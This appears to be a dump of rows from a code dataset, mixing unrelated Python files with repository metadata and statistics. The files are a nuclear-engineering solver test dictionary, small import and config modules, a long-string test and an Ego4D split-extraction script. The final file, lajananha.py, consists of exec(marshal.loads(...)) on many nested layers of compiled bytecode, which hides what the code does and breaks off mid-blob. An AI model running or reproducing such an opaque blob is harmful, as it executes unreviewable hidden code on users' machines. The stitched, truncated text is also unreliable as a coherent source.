AllSafeCyberSecur1ty/Nuclear-Engineering
|
302d6dcc7c0a85a9191098366b076cf9cb5a9f6e
|
[
"MIT"
] | null | null | null |
pyne/tests/spatial_solvers/dictionary_populate_test.py
|
AllSafeCyberSecur1ty/Nuclear-Engineering
|
302d6dcc7c0a85a9191098366b076cf9cb5a9f6e
|
[
"MIT"
] | 1
|
2022-03-26T19:59:13.000Z
|
2022-03-26T19:59:13.000Z
|
"""This file creates a sample dictionary to test the spatial_solver code's."""
import numpy as np
cell_widths = np.array([0.25, 0.25, 0.25, 0.25], "float64", order="F")
def populate_simple(solverin, solvertypein):
solver_dict = {
"solver": solverin,
"solver_type": solvertypein,
"spatial_order": 1,
"angular_quadrature_order": 4,
"angular_quadrature_type": 1,
"nodes_xyz": [4, 4, 4],
"num_groups": 1,
"num_materials": 1,
"x_cells_widths": cell_widths,
"y_cells_widths": cell_widths,
"z_cells_widths": cell_widths,
#'x_cells_widths':[0.25, 0.25, 0.25, 0.25],
#'y_cells_widths':[0.25, 0.25, 0.25, 0.25],
#'z_cells_widths':[0.25, 0.25, 0.25, 0.25],
"x_boundry_conditions": [2, 2],
"y_boundry_conditions": [2, 2],
"z_boundry_conditions": [2, 2],
#'material_id': np.array([[[1]*4]*4]*4, 'float64'),
"material_id": [[[1] * 4] * 4] * 4,
"quadrature_file": "quad_file",
"xs_file": "spatial_solvers/xs",
"source_input_file": "spatial_solvers/src_4.dat",
#'source_input_file':'src_non_binary',
"bc_input_file": "spatial_solvers/bc_4.dat",
"flux_output_file": "spatial_solvers/phi_4.ahot",
"convergence_criterion": 1.0e-12,
"max_iterations": 6000,
"moments_converged": 0,
"converge_tolerence": 1.0e-10,
}
if solverin == "SCTSTEP":
solver_dict["bc_input_file"] = "spatial_solvers/bc_4_sct.dat"
return solver_dict
def populate_simple_with_warnings(solverin):
solver_dict = {
"solver": solverin,
#'solver_type':solvertypein,
#'spatial_order':1,
#'angular_quadrature_order':4,
#'angular_quadrature_type':1,
"nodes_xyz": [4, 4, 4],
"num_groups": 1,
"num_materials": 1,
"x_cells_widths": cell_widths,
"y_cells_widths": cell_widths,
"z_cells_widths": cell_widths,
"x_boundry_conditions": [2, 2],
"y_boundry_conditions": [2, 2],
"z_boundry_conditions": [2, 2],
"material_id": [[[1] * 4] * 4] * 4,
"quadrature_file": "spatial_solvers/quad_file",
"xs_file": "spatial_solvers/xs",
"source_input_file": "spatial_solvers/src_4.dat",
"bc_input_file": "spatial_solvers/bc_4.dat",
"flux_output_file": "spatial_solvers/phi_4.ahot",
#'convergence_criterion':1.e-12,
#'max_iterations':6000,
#'moments_converged':0,
#'converge_tolerence':1.e-10
}
return solver_dict
def populate_intermediate_1(solverin, solvertypein):
solver_dict = {
"solver": solverin,
"solver_type": solvertypein,
"spatial_order": 1,
"angular_quadrature_order": 4,
"angular_quadrature_type": 1,
"nodes_xyz": [4, 4, 4],
"num_groups": 1,
"num_materials": 2,
"x_cells_widths": cell_widths,
"y_cells_widths": cell_widths,
"z_cells_widths": cell_widths,
"x_boundry_conditions": [2, 2],
"y_boundry_conditions": [2, 2],
"z_boundry_conditions": [2, 2],
"material_id": [
[
[1, 2, 1, 2],
[2, 1, 2, 1],
[1, 2, 1, 2],
[2, 1, 2, 1],
],
[
[2, 1, 2, 1],
[1, 2, 1, 2],
[2, 1, 2, 1],
[1, 2, 1, 2],
],
[
[1, 2, 1, 2],
[2, 1, 2, 1],
[1, 2, 1, 2],
[2, 1, 2, 1],
],
[
[2, 1, 2, 1],
[1, 2, 1, 2],
[2, 1, 2, 1],
[1, 2, 1, 2],
],
],
"quadrature_file": "quad_file",
"xs_file": "spatial_solvers/xs_alternating",
"source_input_file": "spatial_solvers/src_4.dat",
"bc_input_file": "spatial_solvers/bc_4.dat",
"flux_output_file": "spatial_solvers/phi_4.ahot",
"convergence_criterion": 1.0e-12,
"max_iterations": 6000,
"moments_converged": 0,
"converge_tolerence": 1.0e-10,
}
if solverin == "SCTSTEP":
solver_dict["bc_input_file"] = "spatial_solvers/bc_4_sct.dat"
return solver_dict
| 33.353846
| 78
| 0.531827
| 539
| 4,336
| 3.955473
| 0.157699
| 0.02439
| 0.026735
| 0.02439
| 0.888837
| 0.871013
| 0.871013
| 0.871013
| 0.850844
| 0.82364
| 0
| 0.073564
| 0.313423
| 4,336
| 129
| 79
| 33.612403
| 0.642593
| 0.113007
| 0
| 0.850467
| 0
| 0
| 0.359718
| 0.123302
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028037
| false
| 0
| 0.009346
| 0
| 0.065421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
909c5f61656651fdc8cac87e62c0ab706502f314
| 203
|
py
|
Python
|
jackal_envs/envs/__init__.py
|
dgauraang/APPLR
|
06e0e26e1d3449406a905e6d282797f1f572547a
|
[
"MIT"
] | null | null | null |
jackal_envs/envs/__init__.py
|
dgauraang/APPLR
|
06e0e26e1d3449406a905e6d282797f1f572547a
|
[
"MIT"
] | null | null | null |
jackal_envs/envs/__init__.py
|
dgauraang/APPLR
|
06e0e26e1d3449406a905e6d282797f1f572547a
|
[
"MIT"
] | null | null | null |
from jackal_envs.envs.jackal_navigation_env import GazeboJackalNavigationEnv
from jackal_envs.envs.gazebo_simulation import GazeboSimulation
from jackal_envs.envs.navigation_stack import NavigationStack
| 50.75
| 76
| 0.91133
| 25
| 203
| 7.12
| 0.48
| 0.168539
| 0.235955
| 0.303371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059113
| 203
| 3
| 77
| 67.666667
| 0.931937
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
90a4af250b62ba0734941f177b6e41db8fde0a63
| 856
|
py
|
Python
|
tests/basics/string_large.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 13,648
|
2015-01-01T01:34:51.000Z
|
2022-03-31T16:19:53.000Z
|
tests/basics/string_large.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 7,092
|
2015-01-01T07:59:11.000Z
|
2022-03-31T23:52:18.000Z
|
tests/basics/string_large.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 4,942
|
2015-01-02T11:48:50.000Z
|
2022-03-31T19:57:10.000Z
|
s1 = "long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string"
s2 = "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string"
| 285.333333
| 498
| 0.820093
| 116
| 856
| 6.051724
| 0.043103
| 0.584046
| 0.797721
| 1.139601
| 0.994302
| 0.994302
| 0.994302
| 0.994302
| 0.994302
| 0.994302
| 0
| 0.00271
| 0.13785
| 856
| 2
| 499
| 428
| 0.948509
| 0
| 0
| 0
| 0
| 0.5
| 0.928738
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
90bf53e9d3b84ba35c0f7a4ea8314ac4361859ea
| 95
|
py
|
Python
|
tbhandler/config.py
|
quintenroets/tbhandler
|
f2c399a1403e538d77c39e87b1a2a79a3e30f286
|
[
"MIT"
] | null | null | null |
tbhandler/config.py
|
quintenroets/tbhandler
|
f2c399a1403e538d77c39e87b1a2a79a3e30f286
|
[
"MIT"
] | null | null | null |
tbhandler/config.py
|
quintenroets/tbhandler
|
f2c399a1403e538d77c39e87b1a2a79a3e30f286
|
[
"MIT"
] | null | null | null |
import os
def show_locals():
return os.environ.get("full_traceback", "false") != "false"
| 15.833333
| 63
| 0.673684
| 13
| 95
| 4.769231
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 95
| 5
| 64
| 19
| 0.775
| 0
| 0
| 0
| 0
| 0
| 0.252632
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
90c3ee40f91e317b722d1bc654fbd4101615b359
| 5,601
|
py
|
Python
|
utils/ground_truth/extract_clipnames_and_split_indices.py
|
EGO4D/audio-visual
|
bed9d837f4212e89540fe73f54399f69739b73f5
|
[
"MIT"
] | 15
|
2021-12-06T14:13:23.000Z
|
2022-03-14T02:02:53.000Z
|
utils/ground_truth/extract_clipnames_and_split_indices.py
|
EGO4D/audio-visual
|
bed9d837f4212e89540fe73f54399f69739b73f5
|
[
"MIT"
] | null | null | null |
utils/ground_truth/extract_clipnames_and_split_indices.py
|
EGO4D/audio-visual
|
bed9d837f4212e89540fe73f54399f69739b73f5
|
[
"MIT"
] | 3
|
2021-11-25T19:10:21.000Z
|
2022-03-11T12:10:41.000Z
|
# Extract clipnames and video indices for training, testing and validation
# Usage: python3 extract_clipnames_and_split_indices.py
import json
import os
def write_list(file_name, alist):
with open(file_name, 'w') as f:
for item in alist:
f.write("%s\n" % str(item))
with open('av_train.json') as f:
data = json.load(f)
clip_uids = []
clip_names = []
for n in range(len(data['videos'])):
for m in range(len(data['videos'][n]['clips'])):
clip_uid = data['videos'][n]['clips'][m]['clip_uid']
clip_uids.append(clip_uid)
clip_names.append(clip_uid + '.mp4')
with open('av_val.json') as f:
data = json.load(f)
for n in range(len(data['videos'])):
for m in range(len(data['videos'][n]['clips'])):
clip_uid = data['videos'][n]['clips'][m]['clip_uid']
clip_uids.append(clip_uid)
clip_names.append(clip_uid + '.mp4')
#with open('av_test.json') as f:
# data = json.load(f)
#
#for n in range(len(data['videos'])):
# for m in range(len(data['videos'][n]['clips'])):
# clip_uid = data['videos'][n]['clips'][m]['clip_uid']
# clip_uids.append(clip_uid)
# clip_names.append(clip_uid + '.mp4')
write_list('v.txt', clip_names)
with open('av_val.json') as f:
data = json.load(f)
val_clip_indices = []
for n in range(len(data['videos'])):
for m in range(len(data['videos'][n]['clips'])):
val_clip_uid = data['videos'][n]['clips'][m]['clip_uid']
val_clip_indices.append(clip_uids.index(val_clip_uid))
write_list('val.txt', val_clip_indices)
#with open('av_test.json') as f:
# data = json.load(f)
#
#test_clip_indices = []
#for n in range(len(data['videos'])):
# for m in range(len(data['videos'][n]['clips'])):
# test_clip_uid = data['videos'][n]['clips'][m]['clip_uid']
# test_clip_indices.append(clip_uids.index(test_clip_uid))
#
#write_list('test.txt', test_clip_indices)
with open('av_train.json') as f:
data = json.load(f)
train_clip_indices = []
for n in range(len(data['videos'])):
for m in range(len(data['videos'][n]['clips'])):
train_clip_uid = data['videos'][n]['clips'][m]['clip_uid']
train_clip_indices.append(clip_uids.index(train_clip_uid))
write_list('train.txt', train_clip_indices)
os.system('cp v.txt ../../active-speaker-detection/vad/v.txt')
os.system('cp v.txt ../../diarization/audio-visual/DER/der_train_on_ego4d/v.txt')
os.system('cp v.txt ../../diarization/audio-visual/DER/der_notrain_on_ego4d/v.txt')
os.system('cp v.txt ../../active-speaker-detection/wearer/energy_based/v.txt')
os.system('cp v.txt ../../active-speaker-detection/wearer/spectrogram/data/v.txt')
os.system('cp v.txt ../../active-speaker-detection/active_speaker/mrc_active_speaker_detection/prediction/v.txt')
os.system('cp v.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_talknet/input/v.txt')
os.system('cp v.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_mrc/input/v.txt')
os.system('cp v.txt ../../active-speaker-detection/audio_embedding/make_audio_embeddings/v.txt')
os.system('cp v.txt ../../active-speaker-detection/surrounding_people_audio_matching/mrc/v.txt')
os.system('cp v.txt ../../active-speaker-detection/surrounding_people_audio_matching/talknet/v.txt')
os.system('cp v.txt ../../tracking/v.txt')
os.system('cp v.txt ../../tracking/global_tracking/v.txt')
#os.system('cp test.txt ../../diarization/audio-visual/DER/der_train_on_ego4d/test.txt')
#os.system('cp test.txt ../../diarization/audio-visual/DER/der_notrain_on_ego4d/test.txt')
#os.system('cp test.txt ../../wearer/energy_based/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/active_speaker/mrc_active_speaker_detection/prediction/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_talknet/input/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_mrc/input/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/audio_embedding/make_audio_embeddings/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/surrounding_people_audio_matching/mrc/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/surrounding_people_audio_matching/talknet/test.txt')
#os.system('cp test.txt ../../tracking/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/wearer/spectrogram/prediction')
os.system('cp val.txt ../../diarization/audio-visual/DER/der_train_on_ego4d/val.txt')
os.system('cp val.txt ../../diarization/audio-visual/DER/der_notrain_on_ego4d/val.txt')
os.system('cp val.txt ../../active-speaker-detection/wearer/energy_based/val.txt')
os.system('cp val.txt ../../active-speaker-detection/active_speaker/mrc_active_speaker_detection/prediction/val.txt')
os.system('cp val.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_talknet/input/val.txt')
os.system('cp val.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_mrc/input/val.txt')
os.system('cp val.txt ../../active-speaker-detection/audio_embedding/make_audio_embeddings/val.txt')
os.system('cp val.txt ../../active-speaker-detection/surrounding_people_audio_matching/mrc/val.txt')
os.system('cp val.txt ../../active-speaker-detection/surrounding_people_audio_matching/talknet/val.txt')
os.system('cp val.txt ../../tracking/val.txt')
os.system('cp val.txt ../../active-speaker-detection/wearer/spectrogram/prediction')
os.system('cp train.txt ../../active-speaker-detection/wearer/spectrogram/train/train.txt')
| 47.871795
| 124
| 0.718979
| 880
| 5,601
| 4.395455
| 0.094318
| 0.144519
| 0.093071
| 0.11091
| 0.885729
| 0.880041
| 0.840745
| 0.823164
| 0.800414
| 0.714064
| 0
| 0.001954
| 0.086056
| 5,601
| 116
| 125
| 48.284483
| 0.753663
| 0.315836
| 0
| 0.34375
| 0
| 0.0625
| 0.567518
| 0.436694
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015625
| false
| 0
| 0.03125
| 0
| 0.046875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2900c9a70465235895f01cc371c9f55b7cf326e9
| 147,718
|
py
|
Python
|
lajananha.py
|
sanjida9999/nwnwin
|
9bd8af291561a3bd007ec97ce21f25db09b63546
|
[
"Apache-2.0"
] | null | null | null |
lajananha.py
|
sanjida9999/nwnwin
|
9bd8af291561a3bd007ec97ce21f25db09b63546
|
[
"Apache-2.0"
] | null | null | null |
lajananha.py
|
sanjida9999/nwnwin
|
9bd8af291561a3bd007ec97ce21f25db09b63546
|
[
"Apache-2.0"
] | null | null | null |
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x19\xd9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xba\xd8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s[\xd8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xfc\xd7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x9d\xd7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s>\xd7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xdf\xd6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x80\xd6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s!\xd6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xc2\xd5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sc\xd5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x04\xd5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xa5\xd4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sF\xd4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xe7\xd3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x88\xd3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s)\xd3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xca\xd2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sk\xd2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x0c\xd2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xad\xd1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sN\xd1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xef\xd0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x90\xd0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s1\xd0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xd2\xcf\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02ss\xcf\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x14\xcf\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xb5\xce\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sV\xce\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xf7\xcd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x98\xcd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s9\xcd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xda\xcc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s{\xcc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x1c\xcc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xbd\xcb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s^\xcb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xff\xca\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xa0\xca\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sA\xca\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xe2\xc9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x83\xc9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s$\xc9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xc5\xc8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sf\xc8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x07\xc8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xa8\xc7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sI\xc7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xea\xc6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x8b\xc6\x00\x